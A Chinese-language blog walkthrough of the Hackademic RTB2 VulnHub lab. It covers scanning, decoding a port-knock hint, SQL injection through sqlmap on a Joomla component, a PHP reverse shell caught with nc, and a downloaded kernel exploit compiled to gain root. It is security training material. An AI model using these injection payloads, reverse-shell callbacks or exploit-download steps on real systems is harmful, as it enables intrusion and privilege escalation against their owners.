vulnhub靶机渗透[Hackademic-RTB2]

Posted on Edited on In Views: Word count in article: 7.8k Reading time ≈ 29 mins.

名称:Hackademic:RTB2
发布日期:2011年9月6日

下载

  • Download (Mirror): https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip
  • Download (Torrent): https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip.torrent

描述:

这是mr.pr0n提出的第二个现实黑客攻击挑战
下载目标并获得root。
毕竟,尝试读取根目录中文件“ key.txt”的内容。
请享用!

漏洞:

  • 纯文本密码
  • 特权提升
  • SQL注入
  • 不受限制地上传危险类型的文件

信息收集

老规矩上nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
root@kali:~# nmap -sn -v 192.168.84.0/24
Nmap scan report for 192.168.84.142
Host is up (0.00022s latency).
MAC Address: 00:0C:29:74:B5:21 (VMware)

root@kali:~# nmap -A -v -sS -Pn -T4 --script=vuln 192.168.84.142
80/tcp  open     http    Apache httpd 2.2.14 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.84.142
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.84.142:80/
|     Form id: username
|_    Form action: check.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /phpmyadmin/: phpMyAdmin
|   /icons/: Potentially interesting folder w/ directory listing
|_  /index/: Potentially interesting folder
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.2.14: 
|       CVE-2010-0425   10.0    https://vulners.com/cve/CVE-2010-0425
|       CVE-2011-3192   7.8     https://vulners.com/cve/CVE-2011-3192
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668
|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167
|       CVE-2013-2249   7.5     https://vulners.com/cve/CVE-2013-2249
|       CVE-2012-0883   6.9     https://vulners.com/cve/CVE-2012-0883
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2013-1862   5.1     https://vulners.com/cve/CVE-2013-1862
|       CVE-2014-0231   5.0     https://vulners.com/cve/CVE-2014-0231
|       CVE-2014-0098   5.0     https://vulners.com/cve/CVE-2014-0098
|       CVE-2013-6438   5.0     https://vulners.com/cve/CVE-2013-6438
|       CVE-2012-4557   5.0     https://vulners.com/cve/CVE-2012-4557
|       CVE-2011-3368   5.0     https://vulners.com/cve/CVE-2011-3368
|       CVE-2010-2068   5.0     https://vulners.com/cve/CVE-2010-2068
|       CVE-2010-1452   5.0     https://vulners.com/cve/CVE-2010-1452
|       CVE-2010-0408   5.0     https://vulners.com/cve/CVE-2010-0408
|       CVE-2012-0031   4.6     https://vulners.com/cve/CVE-2012-0031
|       CVE-2011-3607   4.4     https://vulners.com/cve/CVE-2011-3607
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2013-1896   4.3     https://vulners.com/cve/CVE-2013-1896
|       CVE-2012-4558   4.3     https://vulners.com/cve/CVE-2012-4558
|       CVE-2012-3499   4.3     https://vulners.com/cve/CVE-2012-3499
|       CVE-2012-0053   4.3     https://vulners.com/cve/CVE-2012-0053
|       CVE-2011-4317   4.3     https://vulners.com/cve/CVE-2011-4317
|       CVE-2011-3639   4.3     https://vulners.com/cve/CVE-2011-3639
|       CVE-2011-3348   4.3     https://vulners.com/cve/CVE-2011-3348
|       CVE-2011-0419   4.3     https://vulners.com/cve/CVE-2011-0419
|       CVE-2010-0434   4.3     https://vulners.com/cve/CVE-2010-0434
|       CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
|       CVE-2012-2687   2.6     https://vulners.com/cve/CVE-2012-2687
|_      CVE-2011-4415   1.2     https://vulners.com/cve/CVE-2011-4415
666/tcp filtered doom

经过尝试发现80端口没有什么好东西,666端口被过滤,源代码中没有任何内容,可疑标头,登录中没有sql注入。 我在目标上运行了OpenVAS,Dirbuster和Nikto,但是除了Phpmyadmin界面外,什么都没有发现,无论执行什么操作,该界面始终使我“无法连接到MySQL服务器”错误。 我以为Web服务器可能是一个错误的前端,而这可能是机器上隐藏的其他东西,所以接下来我运行了UDP扫描,它显示了一个附加端口:

1
2
root@kali:~# nmap -sU -F -n -T4 -v 192.168.84.142
5353/udp  open          zeroconf

http://192.168.84.143/登陆页面输入‘ or 1=1–’ /// ‘ or 1=1–’发现返回了一个页面其中有Ok, nice shot…
…but, you are looking in a wrong place bro! ;-),直接右键查看源代码,发现异常字符串

1
%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A

先url解码

1
3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e 0d 0a 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 69 6e 27 20 6f 6e 20 68 65 61 76 65 6e 27 73 20 64 6f 6f 72 20 2e 2e 20 3a 29 0d 0a 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 0d 0a 3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e

再hex解码

1
2
3
4
5
6
7
< - - - - - - - - - > 
 
 K n o c k   K n o c k   K n o c k i n '   o n   h e a v e n ' s   d o o r   . .   : ) 
 
 0 0 1 1 0 0 0 1   0 0 1 1 0 0 0 0   0 0 1 1 0 0 0 0   0 0 1 1 0 0 0 1   0 0 1 1 1 0 1 0   0 0 1 1 0 0 0 1   0 0 1 1 0 0 0 1   0 0 1 1 0 0 0 0   0 0 1 1 0 0 0 1   0 0 1 1 1 0 1 0   0 0 1 1 0 0 0 1   0 0 1 1 0 0 0 0   0 0 1 1 0 0 0 1   0 0 1 1 0 0 0 1   0 0 1 1 1 0 1 0   0 0 1 1 0 0 0 1   0 0 1 1 0 0 0 0   0 0 1 1 0 0 0 0   0 0 1 1 0 0 0 1 
 
 < - - - - - - - - - >

再二进制解码,SNEAK: Snarkles.Net Encryption Assortment Kit - Version 1.28,得到

1
1001:1101:1011:1001

看来是做了端口碰撞措施,端口碰撞的主要目的是通过进行端口扫描来防止攻击者扫描系统以寻找可能被利用的服务,因为除非攻击者发送正确的碰撞顺序,否则受保护的端口将显得关闭。编写下列bash脚本打开666端口

1
2
3
4
5
#!/bin/bash
for i in 1001 1101 1011 1001
do
nc 192.168.84.143 80 $i
done

运行脚本,稍等片刻端口即可打开

1
root@kali:~# ./knock.sh

进一步的版本扫描表明这是多播DNS协议。找不到任何可利用的东西。再次使用详细标志和–packet-trace选项运行Nmap,这一次它返回了一个新端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
nmap -A -v -sS -Pn -T4 --packet-trace 192.168.84.142

NSE: TCP 192.168.84.135:52112 > 192.168.84.142:666 | CLOSE
NSOCK INFO [20.7300s] nsock_iod_delete(): nsock_iod_delete (IOD #70)
NSE: TCP 192.168.84.135:41738 > 192.168.84.142:80 | CLOSE
NSOCK INFO [20.7300s] nsock_iod_delete(): nsock_iod_delete (IOD #71)
Completed NSE at 02:17, 0.10s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Nmap scan report for 192.168.84.142
Host is up (0.00049s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
80/tcp  open  http    Apache httpd 2.2.14 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: Hackademic.RTB2
666/tcp open  http    Apache httpd 2.2.14 ((Ubuntu))
|_http-generator: Joomla! 1.5 - Open Source Content Management
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 14 disallowed entries 
| /administrator/ /cache/ /components/ /images/ 
| /includes/ /installation/ /language/ /libraries/ /media/ 
|_/modules/ /plugins/ /templates/ /tmp/ /xmlrpc/
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: Hackademic.RTB2

一定是以前报告为已过滤的端口。 版本扫描显示这实际上是另一台Web服务器!nmap牛逼!!!firefox访问666端口

可以看到是joomla 1.5 templates版本的。

使用自己的方法getshell

点击下图所示的位置,burp抓包保存为sqlmap.txt,然后sqlmap -r跑此包,发现是dba权限的注入能–os-shell,多年前的老靶机果真是够垃圾,我主要是用来学习各种漏洞知识点,以便于实战碰到的话,能够迅速联想到是什么漏洞并且成功利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
root@kali:~# sqlmap -r sqlmap.txt --is-dba
        ___
       __H__                                                                                           
 ___ ___[']_____ ___ ___  {1.3.12#stable}                                                              
|_ -| . [)]     | .'| . |                                                                              
|___|_  ["]_|_|_|__,|  _|                                                                              
      |_|V...       |_|   http://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:21:49 /2019-12-12/

[03:21:49] [INFO] parsing HTTP request from 'sqlmap.txt'
[03:21:49] [INFO] resuming back-end DBMS 'mysql' 
[03:21:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: letter (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: option=com_abc&view=abc&letter=List of content items...' AND (SELECT 4640 FROM(SELECT COUNT(*),CONCAT(0x7170786b71,(SELECT (ELT(4640=4640,1))),0x716b787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uVyL&Itemid=3

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: option=com_abc&view=abc&letter=List of content items...' AND (SELECT 1182 FROM (SELECT(SLEEP(5)))sLUv)-- PIge&Itemid=3

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: option=com_abc&view=abc&letter=List of content items...' UNION ALL SELECT NULL,CONCAT(0x7170786b71,0x5248524f517a4a6d7669416152587a486a48704b4a45444c534d74786659424f614f7147534d7965,0x716b787871)#&Itemid=3
---
[03:21:49] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[03:21:49] [INFO] testing if current user is DBA
[03:21:49] [INFO] fetching current user
current user is DBA: True
[03:21:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.84.142'

[*] ending @ 03:21:49 /2019-12-12/


root@kali:~# sqlmap -r sqlmap.txt --os-shell
        ___
       __H__                                                                                           
 ___ ___[(]_____ ___ ___  {1.3.12#stable}                                                              
|_ -| . ["]     | .'| . |                                                                              
|___|_  [(]_|_|_|__,|  _|                                                                              
      |_|V...       |_|   http://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:45:59 /2019-12-12/

[03:45:59] [INFO] parsing HTTP request from 'sqlmap.txt'
[03:45:59] [INFO] resuming back-end DBMS 'mysql' 
[03:45:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: letter (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: option=com_abc&view=abc&letter=List of content items...' AND (SELECT 4640 FROM(SELECT COUNT(*),CONCAT(0x7170786b71,(SELECT (ELT(4640=4640,1))),0x716b787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uVyL&Itemid=3

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: option=com_abc&view=abc&letter=List of content items...' AND (SELECT 1182 FROM (SELECT(SLEEP(5)))sLUv)-- PIge&Itemid=3

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: option=com_abc&view=abc&letter=List of content items...' UNION ALL SELECT NULL,CONCAT(0x7170786b71,0x5248524f517a4a6d7669416152587a486a48704b4a45444c534d74786659424f614f7147534d7965,0x716b787871)#&Itemid=3
---
[03:46:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[03:46:00] [INFO] going to use a web backdoor for command prompt
[03:46:00] [INFO] fingerprinting the back-end DBMS operating system
[03:46:00] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
[03:46:02] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
[03:46:05] [INFO] retrieved web server absolute paths: '/index~.php'
[03:46:05] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[03:46:05] [WARNING] reflective value(s) found and filtering out
[03:46:05] [WARNING] unable to upload the file stager on '/var/www/'
[03:46:05] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[03:46:05] [WARNING] expect junk characters inside the file as a leftover from UNION query
[03:46:05] [INFO] the remote file '/var/www/tmpussxf.php' is larger (701 B) than the local file '/tmp/sqlmap2xlaxhqs4350/tmpgmt8uc8y' (700B)                                                                  
[03:46:05] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.168.84.142:666/tmpussxf.php
[03:46:05] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.168.84.142:666/tmpbmblb.php
[03:46:05] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ls
do you want to retrieve the command standard output? [Y/n/a] command standard output:
---
CHANGELOG.php
COPYRIGHT.php
CREDITS.php
INSTALL.php
LICENSE.php
LICENSES.php
Untitledt.png
_installation
administrator
cache
components
configuration.php
configuration.php-dist
htaccess.txt
images
includes
index.php
index2.php
language
libraries
logs
media
modules
pC4Hp8kt@Px8PgkV$!
plugins
robots.txt
templates
tmp
tmpbmblb.php
tmpugano.php
tmpupcaf.php
tmpussxf.php
tmpuxtor.php
welcome
xmlrpc
xxx.html
---
os-shell>

下面使用–os-shell执行成功后sqlmap生成的上传payload上传kali中的php反弹木马来反弹shell,php反弹木马中修改端口和ip的操作不用我多说

ls查看成功上传的木马,并且浏览器访问,kali端 nc -lvp 5566 监听返回了shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
os-shell> ls
do you want to retrieve the command standard output? [Y/n/a] command standard output:
---
15285
15285.c
CHANGELOG.php
COPYRIGHT.php
CREDITS.php
INSTALL.php
LICENSE.php
LICENSES.php
Untitledt.png
_installation
administrator
bullfuck.php
cache
components
configuration.php
configuration.php-dist
htaccess.txt
images
includes
index.php
index2.php
language
libraries
logs
media
modules
pC4Hp8kt@Px8PgkV$!
php-reverse-shell.php
plugins
robots.txt
templates
tmp
tmpbmblb.php
tmpugano.php
tmpupcaf.php
tmpussxf.php
tmpuxtor.php
welcome
xmlrpc
xxx.html
---
os-shell> 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.84.142: inverse host lookup failed: Unknown host
connect to [192.168.84.135] from (UNKNOWN) [192.168.84.142] 42982
Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux
 11:18:34 up  7:36,  0 users,  load average: 0.15, 0.11, 0.30
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ pwd
pwd
/var/www

提权

Hackademic-RTB2靶机所用的提权exp和Hackademic-RTB1靶机所用的一模一样,下载地址:

然后在kali中存在exp的目录下运行python一行代码在局域网中分享下载文件。

1
2
root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

然后在shell中执行命令下载该exp

1
2
3
4
5
6
7
8
9
10
11
$ wget http://192.168.84.135:8000/15285.c
wget http://192.168.84.135:8000/15285.c
--2019-12-13 05:38:57--  http://192.168.84.135:8000/15285.c
Connecting to 192.168.84.135:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [text/plain]
Saving to: `15285.c'

100%[======================================>] 7,155       --.-K/s   in 0s      

2019-12-13 05:38:57 (893 MB/s) - `15285.c' saved [7155/7155]

编译并运行exp进行提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ gcc 15285.c -o 15285
gcc 15285.c -o 15285
$ ./15285
./15285
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08cac4c
 [+] Resolved default_security_ops to 0xc0773340
 [+] Resolved cap_ptrace_traceme to 0xc02f5060
 [+] Resolved commit_creds to 0xc016dd80
 [+] Resolved prepare_kernel_cred to 0xc016e0c0
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami 
whoami
root
# id
id
uid=0(root) gid=0(root)

That’s so great!!!Excellent!!!然后到root文件夹下找到key.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
# cd /root
cd /root
# ls
ls
Desktop  Key.txt
# cat Key.txt
cat Key.txt
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
